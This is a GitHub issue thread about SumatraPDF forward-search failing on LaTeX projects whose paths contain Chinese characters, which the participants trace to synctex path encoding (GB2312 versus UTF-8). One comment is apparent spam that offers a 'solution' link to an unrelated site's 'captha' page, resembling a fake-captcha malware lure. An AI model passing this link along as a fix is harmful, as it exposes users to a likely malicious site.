### ISSUE TITLE
Forward-search doesn't work when there's Chinese characters in the path.

### ISSUE THREAD

**Issue by gaoqiangks** [sumatrapdfreader/sumatrapdf#4567]
**SumatraPDF version**
v3.6.1677964-bit Pre-release

**Describe the bug**

Forward-search doesn't work when there's Chinese characters in the path.

**To Reproduce**
1.  Open a latex project whose path contains Chinese characters with vscode.
2. Build and perform a forward-search
3. Move the latex project to a directory whose path doesn't contain Chinese characters.
4. Open with vscode, build and perform a forward-search.

**Expected behavior**

Forward-search should behave well regardless of Chinese characters in path.

**File that reproduces the problem**
If this is related to a specific PDF etc. file, please attach the file.

**Screenshots**

https://github.com/user-attachments/assets/46578cd0-ac10-441a-b41b-25558731dffb

**Additional context**

**Comment by GitHubRulesOK** [comment]
This is not an uncommon problem see questions like https://tex.stackexchange.com/questions/562463/how-can-latexmk-compile-file-that-contains-chinese-characters-in-path-in-windows and many  aspects of control of path is basically LaTeX.syctex or Windows UTF both  Outside of SumatraPDF control. (the problem above is PERL "Latexmk is a perl script, and when Windows is used with a default configuration, perl scripts don't support the full range of Unicode characters in filenames" Thus to trace a problem combination the actual hardcoded files are needed. What can work for one user may fail for another machine.

video is not a good way to show filemame faults so  3 SAMPLE failing (1 page) files written **at the same time** from same folder are needed
1) file.tex
2) file.synctex
3) file.pdf
plus the true characters as used in the folder system and even then It may well work in others test systems as each user environment can be wildly different.

**Comment by gaoqiangks** [comment]
@GitHubRulesOK  The attatchment is my source file. I just put it in my home directory, and compile with  ```xelatex-> biber-> xelatex*2```.  SumutraPDF 3.5.2 works well , but for the the lastest pre-release, forward-search doesn't work.
[抽象代数讲义.zip](https://github.com/user-attachments/files/17265147/default.zip)

**Comment by GitHubRulesOK** [comment]
xelatex and  doubled calls for bibliography / multi index always pushes the auxiliaries to their limits I dont have a working configuration for testing all such mixes but SumatraPDF would tend to work well out of the box with  most in the past.

I was pleased to see all files in one zip but that means more points of conflict :-) 

For test  I used `C:\Users\K\Downloads\抽象代数\default` as folder  and double click the title 抽象代数 in PRE-release (3.6.### 32bit portable) replies no sync info found at that point.

HOWEVER using the traditional 3.1.2 also says exactly the same so not just caused by pre-release so we look at the synchronisation file and see it says the path for syncing with is 1:c:/Users/gaoqiang/³éÏó´úÊý½²Òå/./algebra.tex which is not conventional LaTeX Unix or Windows file-naming thus the path is not valid for working with.

OK IF it were true folder name would it work with traditional 3.1.2 ? Lets mod a test file.
![image](https://github.com/user-attachments/assets/16cdd8a6-0305-4ee1-b6e2-a865baed5d95)
![image](https://github.com/user-attachments/assets/867d1154-6795-4700-95fd-923b32d2dc54)

Does it work with pre-release ? Of course it will nothing changed there in SumatraPDF it is the sync file is not correct
![image](https://github.com/user-attachments/assets/ed9d6faf-473a-4838-9e9e-5f957cc67cc9)

**Comment by gaoqiangks** [comment]
@GitHubRulesOK  I re-uploaded a zip file. Unzip it and there's a folder named ```forward_sync```, and you can create a folder ```C:\test_folder```, and put ```forward_sync``` into it. 

[test_folder.zip](https://github.com/user-attachments/files/17266553/test_folder.zip)


SumatraPDf 3.5.2 works well. 

![a](https://github.com/user-attachments/assets/d36c6379-2e7f-41ee-b8dd-16056975c4ea)


However, the lastest pre-release doesn't work.

![b](https://github.com/user-attachments/assets/4beea6dd-8b5a-4845-9d78-856134f98e56)

The operating system is Windows 11, and  the SumatraPDFs are downloaded from the official site. The file ```algebra.synctex``` is encoded with ```GB2312```, which is the default for Chinese.

**Comment by gaoqiangks** [comment]
@GitHubRulesOK  Yes, they are from the same source compilation. I change the system encoding from GB2312 to utf-8, now the lastest prelease works, but  3.5.2 does't work.

**Comment by v3nus-py** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by kjk** [comment]
should be fixed in latest [pre-release](https://www.sumatrapdfreader.org/prerelease)
